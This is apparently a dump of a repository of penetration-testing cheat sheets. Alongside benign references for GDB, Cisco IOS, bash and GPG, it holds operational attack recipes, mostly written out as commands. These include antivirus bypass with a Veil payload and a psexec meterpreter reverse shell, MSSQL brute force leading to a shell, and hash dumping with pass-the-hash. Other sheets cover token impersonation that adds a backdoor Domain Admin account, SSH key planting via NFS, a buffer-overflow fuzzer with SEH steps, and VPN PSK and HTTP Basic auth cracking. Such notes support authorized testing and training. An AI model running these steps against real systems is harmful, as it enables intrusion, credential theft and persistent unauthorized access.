├── Cheatsheet_AIXBuild.txt ├── Cheatsheet_AVBypass.txt ├── Cheatsheet_ApacheSSL.txt ├── Cheatsheet_AttackingMSSQL.txt ├── Cheatsheet_BashScripting.txt ├── Cheatsheet_BuildReviews.txt ├── Cheatsheet_CTF.txt ├── Cheatsheet_CiscoIOS.txt ├── Cheatsheet_CookieStealing.txt ├── Cheatsheet_DomainAdminExploitation.txt ├── Cheatsheet_ExploitDev.txt ├── Cheatsheet_GDB.txt ├── Cheatsheet_GPG.txt ├── Cheatsheet_HTTPBasicAuth.txt ├── Cheatsheet_IKEScan.txt ├── Cheatsheet_LinuxPrivilegeEsc.txt ├── Cheatsheet_LocalSamDump.txt ├── Cheatsheet_MSFPostExploitation.txt ├── Cheatsheet_Metasploit.pdf ├── Cheatsheet_MetasploitPayloads.txt ├── Cheatsheet_MobileAppTesting.txt ├── Cheatsheet_Networking.txt ├── Cheatsheet_OWASPCheckList.txt ├── Cheatsheet_Oracle.txt ├── Cheatsheet_PenTesting.txt ├── Cheatsheet_Pyinstaller.txt ├── Cheatsheet_Python.pdf ├── Cheatsheet_Remediations.txt ├── Cheatsheet_SMBCapture.txt ├── Cheatsheet_SMBEnumeration.txt ├── Cheatsheet_SMTPOpenRelay.txt ├── Cheatsheet_SQLInjection.txt ├── Cheatsheet_SSLStrip.txt ├── Cheatsheet_Solaris.txt ├── Cheatsheet_Tools.txt ├── Cheatsheet_UsefulCommands.txt ├── Cheatsheet_VOIP.txt ├── Cheatsheet_Vlans.txt ├── Cheatsheet_VulnVerify.txt ├── Cheatsheet_WindowsCommandLine.pdf ├── Cheatsheet_WirelessTesting.txt ├── Cheatsheet_XSS.txt ├── Cheatsheet_scp.txt └── README.md /Cheatsheet_AIXBuild.txt: -------------------------------------------------------------------------------- 1 | loslevel: 2 | -------- 3 | 4 | Reports back on installed service pack, maintenance etc. levels of the AIX deployment. 5 | Most of these appear to return absolutely nothing or loads of information. 6 | 7 | oslevel (reports back the overall AIX version e.g. 6.1.0.0) 8 | oslevel -q (reports back known maintenance levels on the host) 9 | oslevel -rq (reports back known Recommended Maintenance Levels, think major releases) 10 | oslevel -sq (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack) 11 | 12 | e.g. 13 | oslevel -s -g 6100-08-03-1339 14 | 15 | lslpp: 16 | ------ 17 | 18 | Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself 19 | 20 | e.g. 21 | lslpp -l (lists all packages, most recent level and state of them) 22 | The package names can be passed back to it for more info, showing their patch management/application cycle. 23 | 24 | e.g. 25 | lslpp -h bos.rte - returns information regarding the updates applied to the Base Operating System package. bos.rte 26 | 27 | rpm: 28 | ---- 29 | 30 | Standard redhat package manager, has turned up on a few machines. 31 | 32 | rpm -qa 33 | rpm -qa --last 34 | These will report back packages installed by rpm and when. 35 | 36 | Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag: 37 | e.g. find /home/ -perm 777 38 | -------------------------------------------------------------------------------- /Cheatsheet_AVBypass.txt: -------------------------------------------------------------------------------- 1 | 1. Generate executable using Veil. 2 | 3 | 2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) 4 | 5 | msf > use exploit/windows/smb/psexec 6 | msf exploit(psexec) > set RHOST 192.168.0.2 7 | RHOST => 192.168.0.2 8 | msf exploit(psexec) > set SMBUser user 9 | SMBUser => user 10 | msf exploit(psexec) > set SMBPass pass 11 | SMBPass => pass 12 | msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe 13 | EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe 14 | msf exploit(psexec) > exploit -------------------------------------------------------------------------------- /Cheatsheet_ApacheSSL.txt: -------------------------------------------------------------------------------- 1 | # Enabling Self signed certificates on local website 2 | 3 | 1. Install OpenSSL 4 | 5 | sudo apt-get install openssl 6 | 7 | 2. Run the following command to generate the self signed SSL certificates: 8 | 9 | sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key 10 | 11 | 3. Enable SSL for Apache 12 | 13 | sudo a2enmod ssl 14 | 15 | 4. Put the default-ssl site available creating a symbolic link 16 | 17 | sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf 18 | 19 | 5. Edit the file default-ssl.conf 20 | 21 | sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf 22 | 23 | Change the following lines to point to the certs: 24 | 25 | SSLCertificateFile /etc/ssl/certs/server.crt 26 | SSLCertificateKeyFile /etc/ssl/private/server.key 27 | 28 | 6. Restart Apache 29 | 30 | sudo /etc/init.d/apache2 restart 31 | 32 | More information: 33 | https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/ 34 | https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html 35 | http://www.akadia.com/services/ssh_test_certificate.html 36 | https://www.sslshopper.com/apache-server-ssl-installation-instructions.html 37 | http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server -------------------------------------------------------------------------------- /Cheatsheet_AttackingMSSQL.txt: -------------------------------------------------------------------------------- 1 | [+] Attacking MSSQL with Metasploit 2 | 3 | [>] Enumerate MSSQL Servers on the network: 4 | 5 | msf > use auxiliary/scanner/mssql/mssql_ping 6 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 7 | Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio. 8 | 9 | [>] Bruteforce MSSQL Database: 10 | 11 | msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login 12 | 13 | [>] Enumerate MSSQL Database: 14 | 15 | msf > use auxiliary/admin/mssql/mssql_enum 16 | 17 | [>] Gain shell using gathered credentials 18 | 19 | msf > use exploit/windows/mssql/mssql_payload 20 | msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 21 | 22 | -------------------------------------------------------------------------------- /Cheatsheet_BashScripting.txt: -------------------------------------------------------------------------------- 1 | Simple Bash Scripting Cheatsheet 2 | -------------------------------- 3 | 4 | [+] nano Shortcuts 5 | ctrl v Next page. 6 | ctrl y Previous page. 7 | ctrl w Where is (find). 8 | ctrl k Cut that line of test. 9 | ctrl x Exit editor. 10 | 11 | [+] Create a text file: 12 | touch file Creates an empty file. 13 | ifconfig > tmp pipe the output of a command 14 | nano file 15 | 16 | [+] Create a file and append text to it: 17 | ifconfig > tmp 18 | echo >> tmp 19 | ping google.com -c3 >> tmp 20 | 21 | [+] How to view a file: 22 | cat file Show entire contents of file. 23 | more file Show one page at a time. Space bar for next page and (q) to exit. 24 | head file Show the first 10 lines. 25 | head -15 file Show the first 15 lines. 26 | tail file Show the last 10 lines. 27 | tail -15 file Show the last 15 lines. 28 | tail -f file Useful when viewing the output of a log file. 29 | 30 | [+] pipe 31 | cat tmp | grep Bcast Feeds the output of one process to the input of another process. 32 | 33 | [+] Processes 34 | ps aux Show all running process for all users. 35 | kill -9 PID Nicely kill a PID. 36 | 37 | [+] Word Count 38 | wc -l tmp2 Count the number of lines in a file 39 | 40 | [+] cut 41 | -d delimiter 42 | -f fields 43 | 44 | [+] sort 45 | Sort by unique sort -u file 46 | sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n 47 | cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address 48 | 49 | [+] awk 50 | awk '{print $1}' file Show the 1st column. 51 | awk '{print $1,$5}' file Show the 1st and 5th columns. 52 | 53 | [+] grep 54 | grep -v Remove a single string. 55 | grep -v 'red' file 56 | 57 | [+] egrep -v 58 | Remove multiple strings egrep -v '(red|white|blue)' file 59 | 60 | [+] sed 61 | sed 's/FOO/BAR/g' file Replace FOO with BAR. 62 | sed 's/FOO//g' file Replace FOO with nothing. 63 | sed '/^FOO/d' file Remove lines that start with FOO. 64 | 65 | [+] colour 66 | 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 67 | echo -e "\e[1;34mThis is a blue text.\e[0m" 68 | 69 | 70 | 71 | 72 | Bash Scripts 73 | ------------ 74 | 75 | [+] Simple bash script: 76 | #!/bin/bash 77 | clear 78 | echo 79 | echo 80 | print "Hello world." 81 | 82 | [+] Make a file executable. 83 | chmod +x file 84 | chmod 755 file 85 | 86 | [+] Variables 87 | name=Bob 88 | echo $name 89 | user=$(whoami) 90 | echo $user 91 | echo 'Hello' $name. 'You are running as' $user. 92 | 93 | #!/bin/bash 94 | clear 95 | echo "Hello World" 96 | name=Bob 97 | ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1` 98 | echo "Hello" $name "Your IP address is:" $ip 99 | 100 | [+] User Input 101 | read -p "Domain: " domain 102 | 103 | #!/bin/bash 104 | echo "Please input your domain:" 105 | read -p "Domain:" domain 106 | ping -c 5 $domain 107 | 108 | [+] Check For No User Input 109 | if [ -z $domain ]; then 110 | echo 111 | echo "#########################" 112 | echo 113 | echo "Invalid choice." 114 | echo 115 | exit 116 | fi 117 | 118 | [+] For loops 119 | #!/bin/bash 120 | 121 | for host in $(cat hosts.txt) 122 | do 123 | command $host 124 | done 125 | 126 | [+] One Liners 127 | 128 | Port Scan: 129 | for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done -------------------------------------------------------------------------------- /Cheatsheet_BuildReviews.txt: -------------------------------------------------------------------------------- 1 | Build Review Cheatsheet 2 | ----------------------- 3 | 4 | [+] Main tasks: 5 | 6 | Any third party installed software and all associated versions. 7 | Password policy applied locally via net accounts commands. 8 | Domain policy applied, including domain password policy. 9 | Logging settings. 10 | Running services and unquoted service paths. 11 | Permissions set on services. 12 | List of patches and hotfixes installed. 13 | Efficacy of AV solutions. May require import of a benign Eicar test file. 14 | USB policy and removable media access (including firewire, CD etc). 15 | Disk encryption (if relevant) 16 | BIOS passwords set. 17 | Proxy settings (if relevant). 18 | Nessus Scan (With Credentials). 19 | 20 | [+] Windows Hosts: 21 | 22 | [+] Server Roles 23 | [+] Server Manager 24 | [+] System Properties 25 | [+] Default Domain Policy 26 | [+] Global Domain Policy 27 | 28 | [+] Net accounts/Users/groups/Administrators 29 | [+] IPConfig/Routing 30 | 31 | [+] Installed Programs 32 | [+] Installed System Updates 33 | [+] AV Version/Definition Dates 34 | [+] Check Computer folders 35 | 36 | [+] Firewall Configuration 37 | [+] Audit Policy 38 | [+] Password/Lockout Policy 39 | [+] Security Policy 40 | [+] User Rights Policy 41 | 42 | [+] Lanman Parameters (HKLM - System - Current Control - Services - LanmanServer - Parameters) 43 | [+] LSA (HKLM - System - Current Control - Control - LSA) 44 | [+] MSV (HKLM - System - Current Control - Control - LSA - MSV1_0) 45 | 46 | systeminfo command 47 | 48 | BIOS password 49 | boot to usb 50 | file system 51 | - encrypted? 52 | - grab /Windows/System32/config/SAM SECURITY SYSTEM 53 | - put C:\Program.exe (eg calc) 54 | 55 | Control Panel 56 | - Windows Firewall 57 | - enabled 58 | - editable 59 | - logs 60 | - System Info 61 | - Windows Update 62 | 63 | Anti-Virus 64 | - config 65 | - logs 66 | - version 67 | - dates 68 | - EICAR 69 | 70 | cmd.exe 71 | script.cmd 72 | - ipconfig /all 73 | - netstat 74 | - net accounts 75 | - net accounts /domain (review password policy) 76 | - net user hacker Password@1 /add 77 | - regedit 78 | - ping 79 | - sched 80 | - tracert 81 | - net use \\IP address_or_host name\ipc$ "" /user:"" # null session 82 | - net use 83 | - net view 84 | - net start 85 | - tasklist 86 | 87 | mount usb 88 | usb autostart 89 | 90 | copy over files 91 | - nc 92 | - enum 93 | - nmap 94 | - DIRE 95 | - EICAR 96 | 97 | # SAM files in backtrack 98 | /Windows/System32/config/SAM SECURITY SYSTEM 99 | 100 | # mounting on desktop review 101 | # mount 102 | # sda1 = client hdd, sdb2 = my usb part 2 103 | # mkdir /mnt/client-hdd 104 | # mount /dev/sda1 /mnt/client-hdd 105 | # mkdir /mnt/win-usb 106 | # mount /dev/sdb2 /mnt/win-usb 107 | 108 | hosts file C:\Windows\System32\drivers\etc\hosts.txt 109 | 110 | SYSVOL GPO preference item, check for obscured passwords in xml 111 | http://blogs.technet.com/b/grouppolicy/archive/2008/08/04/passwords-in-group-policy-preferences.aspx 112 | 113 | The history file is readable by any authenticated user, as shown below: 114 | C:\Users\All Users\Microsoft\Group Policy\History\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml 115 | The same Group Policy Preference XML configuration file is also accessible via the following UNC path on the Domain Controller, again by any authenticated user: 116 | \\Domain_Controller\sysvol\Domain_Name\Policies\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml 117 | 118 | 119 | [+] Unix Based Hosts: 120 | 121 | hostname 122 | whoami 123 | uname -a 124 | cat /etc/lsb-release 125 | dmesg | grep Linux 126 | cat /etc/passwd 127 | cat /etc/sudoers 128 | netstat -antup 129 | ps -aux 130 | ps aux | grep root 131 | crontab -l 132 | /sbin/ifconfig -a 133 | iptables -L 134 | arp -e 135 | cat ~/.bash_history 136 | cat ~/.ssh/authorized_keys 137 | mount 138 | 139 | - Check installed applications 140 | - Check installed compilers/interpreters -------------------------------------------------------------------------------- /Cheatsheet_CTF.txt: -------------------------------------------------------------------------------- 1 | CTF Notes 2 | --------- 3 | 4 | # Enumerate Users via Finger 5 | finger user@192.168.0.20 6 | 7 | # Show nfs shares available 8 | showmount -e 192.168.1.54 9 | 10 | # User nfspysh to mount share and create .ssh directory 11 | nfspysh -o server=192.168.0.20:/home/user 12 | mkdir .ssh 13 | cd .ssh 14 | 15 | # Generate ssh key pair 16 | ssh-keygen 17 | cp id_rsa.pub /tmp/authorized_keys 18 | 19 | # Transfer attacker public key to host 20 | put /tmp/authorized_keys 21 | exit 22 | 23 | # Login to SSH server with no password 24 | SSH_AUTH_SOCK=0 ssh user@192.168.0.20 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /Cheatsheet_CiscoIOS.txt: -------------------------------------------------------------------------------- 1 | Cisco IOS Command Line Cheatsheet 2 | --------------------------------- 3 | 4 | --- Verify Basic Configuration: 5 | 6 | Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc. 7 | SW1# show version 8 | 9 | Shows the current configuration file stored in DRAM. 10 | SW1# show running-config 11 | 12 | Shows the configuration file stored in NVRAM which is used at first boot process. 13 | SW1# show startup-config 14 | 15 | Lists the commands currently held in the history buffer. 16 | SW1# show history 17 | 18 | Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned. 19 | SW1# show ip interface brief 20 | 21 | Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic. 22 | SW1# show interface vlan 1 23 | 24 | Shows the description of all interfaces 25 | SW1# show interfaces description 26 | 27 | Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan. 28 | SW1# show interfaces status 29 | 30 | Shows the public encryption key used for SSH. 31 | SW1# show crypto key mypubkey rsa 32 | 33 | Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server) 34 | SW1# show dhcp lease 35 | 36 | --- Router Modes: 37 | 38 | Router>: User mode = Limited to basic monitoring commands 39 | Router#: Privileged mode (exec-level mode) = Provides access to all other router commands 40 | Router(config)#: global configuration mode = Commands that affect the entire system 41 | Router(config-if)#: interface mode = Commands that affect interfaces 42 | Router(config-subif)#: subinterface mode = Commands that affect subinterfaces 43 | Router(config-line)#: line mode = Commands that affect in lines modes (console, vty, aux…) 44 | Router(config-router)#: router configuration mode 45 | 46 | --- Changing switch hostname: 47 | 48 | Switch(config)# hostname SW1 49 | 50 | --- Configuring passwords: 51 | 52 | SW1(config)# enable secret cisco ! MD5 hash 53 | SW1(config)# enable password notcisco ! Clear text 54 | 55 | --- Securing console port: 56 | 57 | SW1(config)# line con 0 58 | SW1(config-line)# password cisco 59 | SW1(config-line)# login 60 | 61 | --- Securing terminal lines: 62 | 63 | SW1(config)# line vty 0 4 64 | SW1(config-line)# password cisco 65 | SW1(config-line)# login 66 | 67 | --- Encrypting passwords: 68 | 69 | SW1(config)# service password-encryption 70 | 71 | --- Configuring banners: 72 | 73 | SW1(config)# banner motd $ 74 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 75 | UNAUTHORIZED ACCESS IS PROHIBITED 76 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 77 | $ 78 | 79 | --- Giving the switch an IP address: 80 | 81 | SW1(config)# interface vlan 1 82 | SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP 83 | SW1(config-if)# no shutdown 84 | 85 | --- Setting the default gateway: 86 | 87 | SW1(config)# ip default-gateway 172.16.1.1 88 | 89 | --- Saving configuration: 90 | 91 | SW1# copy running-config startup-config 92 | Destination filename [startup-config]? ! Press enter to confirm file name. 93 | Building configuration… 94 | [OK] 95 | 96 | ! Short for write memory. 97 | SW1# wr 98 | Building configuration… 99 | [OK] -------------------------------------------------------------------------------- /Cheatsheet_CookieStealing.txt: -------------------------------------------------------------------------------- 1 | [+] Cookie Stealing: 2 | 3 | [-] Start Web Service 4 | 5 | python -m SimpleHTTPServer 80 6 | 7 | [-] Use one of the following XSS payloads: 8 | 9 | 10 | -------------------------------------------------------------------------------- /Cheatsheet_DomainAdminExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] After compromising a Windows machine: 2 | 3 | [>] List the domain administrators: 4 | From Shell - net group "Domain Admins" /domain 5 | 6 | [>] Dump the hashes (Metasploit) 7 | msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE 8 | 9 | [>] Find the admins (Metasploit) 10 | spool /tmp/enumdomainusers.txt 11 | msf > use auxiliary/scanner/smb/smb_enumusers_domain 12 | msf > set smbuser Administrator 13 | msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 14 | msf > set rhosts 10.10.10.0/24 15 | msf > set threads 8 16 | msf > run 17 | 18 | msf> spool off 19 | 20 | [>] Compromise Admin's box 21 | meterpreter > load incognito 22 | meterpreter > list_tokens -u 23 | meterpreter > impersonate_token MYDOM\\adaministrator 24 | meterpreter > getuid 25 | meterpreter > shell 26 | 27 | C:\> whoami 28 | mydom\adaministrator 29 | C:\> net user hacker /add /domain 30 | C:\> net group "Domain Admins" hacker /add /domain -------------------------------------------------------------------------------- /Cheatsheet_ExploitDev.txt: -------------------------------------------------------------------------------- 1 | Exploit Development Cheatsheet 2 | ------------------------------ 3 | 4 | [+] Fuzzing: 5 | 6 | import socket 7 | 8 | buffer = ["A"] 9 | counter = 50 10 | 11 | while len(buffer) <= 1000: 12 | buffer.append("A" * counter) 13 | counter = counter + 50 14 | 15 | for buffstring in buffer: 16 | print "Fuzzing:" + str(len(buffstring)) 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.connect( ("192.168.0.20", 5555) ) 19 | sock.send(buffstring) 20 | sock.close() 21 | 22 | 23 | [+] Bad Character Testing: 24 | 25 | "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e" 26 | "\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d" 27 | "\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c" 28 | "\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b" 29 | "\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" 30 | "\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59" 31 | "\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68" 32 | "\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77" 33 | "\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86" 34 | "\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95" 35 | "\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4" 36 | "\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3" 37 | "\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2" 38 | "\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1" 39 | "\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 40 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" 41 | "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe" 42 | "\xff" 43 | 44 | 45 | [+] Structured Exception Handler (SEH) Exploitation notes 46 | 47 | - Crash the application 48 | - Check SEH overwirte (view-seh chain) 49 | - Find offset (!mona pattern_create ) 50 | - Find certain SEH references to the cyclic pattern (!mona findmsp) 51 | - Verify offset to NSEH (Next Exception) 52 | - Find POP/POP/RET address with mona (!mona seh -cpb ) 53 | - Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding) 54 | - Add shellcode to the payload 55 | - Ensure existing padding to make sure the crash still happens. -------------------------------------------------------------------------------- /Cheatsheet_GDB.txt: -------------------------------------------------------------------------------- 1 | set disassembly-flavor intel 2 | 3 | $ cat ~/.bash_aliases | grep gdb 4 | alias gdb='gdb -quiet' 5 | 6 | Running gdb 7 | ------------------ 8 | $ gdb - run, then use file command to load object 9 | $ gdb -quiet - supress copyright information 10 | $ gdb object - normal debug 11 | $ gdb object core - analyze core dump 12 | $ gdb object pid - attach to running process 13 | 14 | General commands 15 | ------------------ 16 | set args - set program arguments 17 | show args - show program arguments 18 | run - run the program 19 | run < file - run with input from file 20 | set follow-exec-mode new/sam - set debugger response to an exec call 21 | set write - set write into executables 22 | set write off - unset write int oexecutables 23 | continue - continue running until break 24 | finish - execute until current stack frame ends 25 | source FILE - read commands from script file 26 | shell [cmd] - run cmd in a shell 27 | display /5i $eip - display expression everytime execution stops 28 | undisplay - undisplay expression number 29 | info functions - list all the functions 30 | info variables - list all the variables 31 | info registers - list most common registers 32 | info all-registers - list all registers 33 | info display - print the list of displayed expressions 34 | backtrace - print backtrace of all stack frames 35 | where - same as backtrace 36 | set disassembly-flavor intel - set disassembly style to intel/att 37 | define hook-[cmd] - actions to execute before command 38 | define hooopost-[cmd] - actions to execute after command 39 | define hook-stop - actions to execute when execution stops 40 | 41 | Breakpoints 42 | ------------------ 43 | info breakpoints - list all breakpoints 44 | break [func] - break function name 45 | break *[addr] - break at address 46 | delete [bnum] - delete breakpoint bnum 47 | break if [cond] - break if condition 48 | ignore [bnum] [count] - ignore breakpoint bnum count times 49 | condition [bnum] $eax == 0x22 - add condition for breakpoint 1 50 | condition [bnum] - delete condition for breakpoint 1 51 | 52 | Watchpoints 53 | ------------------ 54 | info watchpoints - list all the watchpoint 55 | watch variable==value - break when variable equals .. 56 | watch $eax == 0x0000ffaa - break when register equals .. 57 | rwatch *[addr] - break on read memory location 58 | awatch *[addr] - break on read/write memory location -------------------------------------------------------------------------------- /Cheatsheet_GPG.txt: -------------------------------------------------------------------------------- 1 | Encrypt 2 | ------------ 3 | sudo gpg -e ~/Desktop/file.doc 4 | 5 | This will prompt you to type in the persons name (public key) to encrypt with. 6 | 7 | Decrypt 8 | ----------- 9 | sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc 10 | 11 | 12 | Import other users' public keys by using: 13 | 14 | sudo gpg --import -------------------------------------------------------------------------------- /Cheatsheet_HTTPBasicAuth.txt: -------------------------------------------------------------------------------- 1 | [>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite 2 | 3 | http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/ 4 | 5 | Burp Suite against HTTP Basic authentication 6 | 7 | To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder. 8 | 9 | Mark only the Base64 encoded string and click Add button to put the markers around it. 10 | 11 | Dictionary attack 12 | 13 | For the dictionary attack I’m using custom iterator intruder option. It allows you to generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”. 14 | Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2. 15 | Go to Payload tab and select Custom iterator option from Payload type dropdown box. 16 | Burp Suite Custom Iterator 17 | Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box. 18 | Position 1 list and separator option 19 | Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox. 20 | Position 2 21 | After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64. 22 | PayloadProcessin_AddRule_Encode 23 | PayloadProcessingEncode 24 | By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding. 25 | That’s it. You can start the Intruder attack. 26 | 27 | Bruteforce attack 28 | 29 | The method I’m using for the bruteforce attack is targeting only one username per Intruder attack. 30 | Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings. 31 | Burp Intruder Brute forcer 32 | In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column. 33 | Burp Intruder Add Prefix 34 | Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding. 35 | Burp Sutei Bruteforce Attack Settings 36 | Done! You can start the Intruder attack! 37 | 38 | [>] Automated Security Analyser for ASP.NET Websites 39 | 40 | https://asafaweb.com -------------------------------------------------------------------------------- /Cheatsheet_IKEScan.txt: -------------------------------------------------------------------------------- 1 | Aggressive Mode VPN -- IKE-Scan, PSK-Crack 2 | 3 | In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. 4 | 5 | This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure. 6 | 7 | It looks like this: 8 | 9 | $ ike-scan 192.168.207.134 10 | Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 11 | 12 | 192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) 13 | Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). 14 | 0 returned handshake; 1 returned notify 15 | 16 | ---------------------------------------------------------------------------------------------------------------------------------- 17 | 18 | $ sudo ike-scan -A 192.168.207.134 19 | Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) 20 | 21 | 192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) 22 | 23 | ---------------------------------------------------------------------------------------------------------------------------------- 24 | 25 | To save with some output: 26 | 27 | $ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key 28 | 29 | Once you have you psk file to crack you're stuck with two options psk-crack and cain 30 | 31 | ---------------------------------------------------------------------------------------------------------------------------------- 32 | 33 | Brute force: 34 | 35 | $psk-crack -b 5 192-168-207-134key 36 | Running in brute-force cracking mode 37 | Brute force with 36 chars up to length 5 will take up to 60466176 iterations 38 | 39 | no match found for MD5 hash 5c178d[SNIP] 40 | Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec) 41 | 42 | Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= 43 | 44 | $ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key 45 | Running in brute-force cracking modde 46 | Brute force with 63 chars up to length 5 will take up to 992436543 iterations 47 | 48 | ---------------------------------------------------------------------------------------------------------------------------------- 49 | 50 | Dictionary attack: 51 | 52 | $psk-crack -d /path/to/dictionary 192-168-207-134key 53 | Running in dictionary cracking mode 54 | 55 | no match found for MD5 hash 5c178d[SNIP] 56 | Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) 57 | 58 | ---------------------------------------------------------------------------------------------------------------------------------- 59 | 60 | References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html -------------------------------------------------------------------------------- /Cheatsheet_LinuxPrivilegeEsc.txt: -------------------------------------------------------------------------------- 1 | Enumeration is the key. 2 | (Linux) privilege escalation is all about: 3 | Collect - Enumeration, more enumeration and some more enumeration. 4 | Process - Sort through data, analyse and prioritisation. 5 | Search - Know what to search for and where to find the exploit code. 6 | Adapt - Customize the exploit, so it fits. 